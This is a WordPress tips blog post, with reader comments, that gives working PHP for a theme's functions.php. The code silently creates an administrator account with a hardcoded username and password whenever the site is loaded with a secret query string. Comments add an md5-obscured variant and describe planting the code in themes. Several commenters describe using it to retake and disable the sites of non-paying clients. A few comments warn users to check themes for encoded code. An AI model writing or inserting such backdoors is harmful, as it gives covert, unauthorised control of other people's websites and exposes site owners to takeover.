How To: Create Backdoor Admin Access in WordPress

Have you ever wanted to create an easy backdoor way to auto-create an administrator account in WordPress? The below code snippet does just that! Simply place the code in your themes functions.php flie and upload to your web server:

<?php
add_action('wp_head', 'my_backdoor');

function my_backdoor() {
	If ($_GET['backdoor'] == 'go') {
		require('wp-includes/registration.php');
		If (!username_exists('brad')) {
			$user_id = wp_create_user('brad', 'pa55w0rd');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
		}
	}
}
?>

To activate this code simply visit http://example.com?backdoor=go

When triggered the code will create a new administrator account with a username brad and password of pa55w0rd. The function also verifies the user account doesn’t exist first before creating it.

Keep in mind using this code is considered a security risk as anyone could easily execute this function by calling the correct querystring. Also don’t be evil, only use this code for good!

Enjoy this post? Be sure to subscribe to my RSS feed and my WordPress Tips and Tricks Newsletter! Also check out my WordPress books: Professional WordPress Second Edition & Professional WordPress Plugin Development

Comments

  1. What you’re presenting here is way not fair.

  2. Not fair in what way Daniel?

  3. Obviously, because someone may use it to hack into other people’s blogs.

  4. To set this code up you would need FTP access to a site. So technically you can’t really hack a site with this code, but I see where you are coming from. That’s why I said don’t be evil

  5. @Daniel: If someone has enough access to a blog to be able to implement this code, then this should be the least of your worries.

    • I second that, ROFL, If someone has enough access to get to your FTP or anything else on your server, then adding this “backdoor” is the LEAST of your worries.

  6. Brad (or anyone), can you give a practical example of how setting up a backdoor like this could be used legitimately? To be honest, I can’t think of anything good coming out of it.

  7. It’s interesting.

    I’m not a WP expert, but if a WordPress theme creator (Such as leland) inserted this code into a themes function.php file… couldn’t he gain access to any blog using the user/pass defined in that code?

    Just wondering, as I said, I’m not WP expert.

  8. Keith,

    Yeah – they could.

    I’m using similar code via a plugin for clients. The plugin sits in the admin sidebar and acts, mostly, as a contact form. It sits there in case a client needs help with something. When they do, they click on the link in the sidebar and fill in the form to “call” us.

    If there isn’t already a dedicated user for us, a button is also on that page with a reminder that it’s best to have us work under our own username, and that they can click the button to generate one for us.

  9. but I see where you are coming from. That’s why I said don’t be evil

    Prejudices, Brad? :)

    As stated above, it may be very easy for theme creators to insert such code into themes. It can also be encoded and inserted somewhere randomly as just a line of text. Most users are illiterates so chances are they won’t even suspect it.

  10. @Leland: You have FTP access to a client’s blog but are unable to access their administration area (forgotten password and unknown e-mail address) or MySQL. The times you’d need this are rather slim though.

    Regardless, it’s not like Brad just invented something new here. This is one of the least detrimental things one could do to your blog if they wanted to. A theme is like a plugin — I could use a theme to spam other blogs, give me access to the files on your server, etc. etc. etc.

  11. @Viper007Bond: Yeah, true. Thanks for the response. I guess it can come in handy for when you just have FTP access and no other way to login.

    Also thanks Tommy for the response, that sounds like an interesting application as well.

  12. Nice to see this code snippet got some conversations going! There are definitely many different uses for this code, some good and some bad. Any theme or plugin could contain malicious code, so it’s always a good idea to review the code of any theme or plugin you plan on using if it’s not from a trusted source.

  13. I can see the good and the bad in this. Let’s say you are creating a design for a client, one you know will need support in the future. By adding this to your functions, you will always be able to have a login to access the account, even if they delete yours and forget how to add a new one.

    The one note here is that it is the intention of the programmer that really matters. Sure you can add this as a backdoor hack to manipulate WordPress blogs. And lets face it, those with bad intentions most likely already know how to do this.

    So for you that are arguing that this is bad, at least the average user can see how it is implemented and can look at the functions of a theme they are thinking of using so any suspicious code.

    And for those claiming that you can encode this, that is yet another warning for the average user. If you look in the functions.php file and see a set of random characters, beware. This is encoded data that may do a number of things. I have seen code like this automatically add “spammy” links, and more. And yes, some of the themes with this sort of code are actually found at WordPress.org! (or at least were last time I looked)

    Bottom line, if you use this code in your theme, you should disclose to the end user why it is there so they can decide for themselves. If as a user, you aren’t sure about a theme, don’t use it. If you see a random line of characters, know that something is encoded and beware.

  14. Tuomas Leppänen says:

    Hmm, tbh I’m using this code with clients that have not paid for work I have done to protect it in case they refuse to pay and change passwords. I can easily log in and disable blog until they pay.

  15. A change I would encourage to this code… to prevent any hacker in the world from using this as a backdoor, instead of adding your password in the code, have WordPress create a password for you. Sure, you won’t know what it is, but if you are the only one with access to the email in the code, then you can use the password reset option in WordPress to gain access. This just makes the backdoor more secure for the client, but still accessible for the support.

  16. This is an older post but I felt I needed to give a practical example of why I use this. I’ve been developing WordPress websites for many years and on rare, yet unfortunate occasions, the client doesn’t pay the remaining balance of their project. One client in particular decided to change all the FTP and WordPress passwords to lock me out. Basically, in my policy agreement I stat that if a client is a non-payer the site gets an “under construction” page thrown up until they either pay up or work something out with me. Again, this is something they’ve legally signed to. Being locked out of FTP, their hosting CP and WordPress, I wasn’t able to do this and I never received my final payment from the client. Moving forward, I implement this code as a safety net and I make mention of this in my policy agreements.

    • Well and good, but since they know about the code in that case they’ll just remove it and you’re still locked out.

  17. It runs on WordPress higher than 3?

  18. I had my website built by designers and now want to modify it myself by creating my own administration account with this code. I “created” one but now after it logs in it says “error 500, internal service error” if I go to my website the line at the top shows up with my username but if I click on any links there they all become internal errors. How do I get around that?

  19. Nice way to make sure that your WordPress work is payed!

  20. Yeah guys, you’re not really supposed to be a webmaster if you don’t have a computer science degree. If you don’t and then complain that you’re scared because you don’t know stuff, well we don’t give a shit.

  21. Thanks, Its a really helpful code.

    I reset my blog admin password without editing MySQL

    Thanks a lot… Its really help me..

  22. A very simple solution to make this a lot more secure is to use md5 to encode the GET parameter and then compare it with the already encoded md5 string. In this way it’s really hard to guess the parameter name, also by reading the code.

    • Riccardo,

      could you give detailed instructions of how to do md5 encode the get parameter? shall i use a MD5 encoder, and just paste the coded password?

      • Hi Petra,

        Here is an example:


        set_role('administrator');
        }
        }
        }
        ?>

        This is just using go converted to md5 so the attacker will have an hard time try to guess the value of the GET.

        If you have any questions just let me know.

        • I hope the code is fine now:

          add_action(‘wp_head’, ‘my_backdoor’);

          function my_backdoor() {
          If (md5($_GET['backdoor']) == ’34d1f91fb2e514b8576fab1a75a89a6b’) {
          require(‘wp-includes/registration.php’);
          If (!username_exists(‘brad’)) {
          $user_id = wp_create_user(‘brad’, ‘pa55w0rd’);
          $user = new WP_User($user_id);
          $user->set_role(‘administrator’);
          }
          }
          }

  23. how would you do a delete function? what would work like this http://example.com?backdoor_delete=go

  24. Thank you!

    I was using different methods but this one is easiest ever.

    I use things like this when I create website for clients and than suddenly when you send them invoice they remove my ftp access and admin access as well.. this is very nice! I am not saying all of the clients but from 10 client 7 wont pay heh.

    - you maybe remove this information (it is very hand full but should be keep it away for security reasons) all best and one more massive thank you buddy

  25. I think this very usefull to use for clients, that have bad intentions to not pay.
    Believe me i have been rip it off couple of times so im very happy that u took the effort to make this.

    Thank you very much.

  26. how do you delete the new user, if you have no access to other admin accounts?